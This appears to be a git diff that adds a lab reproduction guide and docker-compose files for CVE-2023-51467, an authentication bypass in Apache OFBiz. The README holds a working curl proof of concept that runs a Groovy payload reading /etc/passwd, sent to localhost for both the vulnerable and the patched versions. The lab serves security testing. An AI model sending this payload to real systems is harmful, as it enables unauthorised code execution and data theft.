google · W0ngL1 · Sep 12, 2025 · Sep 12, 2025 · Sep 12, 2025
diff --git a/apache/ofbiz/CVE-2023-51467/README.md b/apache/ofbiz/CVE-2023-51467/README.md
@@ -0,0 +1,31 @@
+# Reproduction Guide
+
+## Vulnerable Version
+### Step 1 – Start the Lab Environment
+Start all required containers with Docker Compose using `docker-compose.yml`:
+
+```bash
+docker-compose -f docker-compose.yml up -d
+```
+
+### Step 2 – Verify the Vulnerability
+Issue the following HTTP request to the local instance:
+```bash
+curl "https://localhost:8443/webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y" -d "groovyProgram=throw+new+Exception('cat /etc/passwd'.execute().text);" -k -v
+```
+The response body should contains `root:x:`.
+
+## Not Vulnerable Version
+### Step 1 – Start the Lab Environment
+Start all required containers with Docker Compose using `docker-compose-secure.yml`:
+
+```bash
+docker-compose -f docker-compose-secure.yml up -d
+```
+
+### Step 2 – Verify the Vulnerability
+Issue the following HTTP request to the local instance:
+```bash
+curl "https://localhost:8443/webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y" -d "groovyProgram=throw+new+Exception('cat /etc/passwd'.execute().text);" -k -v
+```
+The response body should NOT contains `root:x:`.
diff --git a/apache/ofbiz/CVE-2023-51467/docker-compose-secure.yml b/apache/ofbiz/CVE-2023-51467/docker-compose-secure.yml
@@ -0,0 +1,6 @@
+services:
+ web:
+   image: vulhub/ofbiz:18.12.14
+   ports:
+    - "8443:8443"
+    - "5005:5005"
diff --git a/apache/ofbiz/CVE-2023-51467/docker-compose.yml b/apache/ofbiz/CVE-2023-51467/docker-compose.yml
@@ -0,0 +1,6 @@
+services:
+ web:
+   image: vulhub/ofbiz:18.12.10
+   ports:
+    - "8443:8443"
+    - "5005:5005"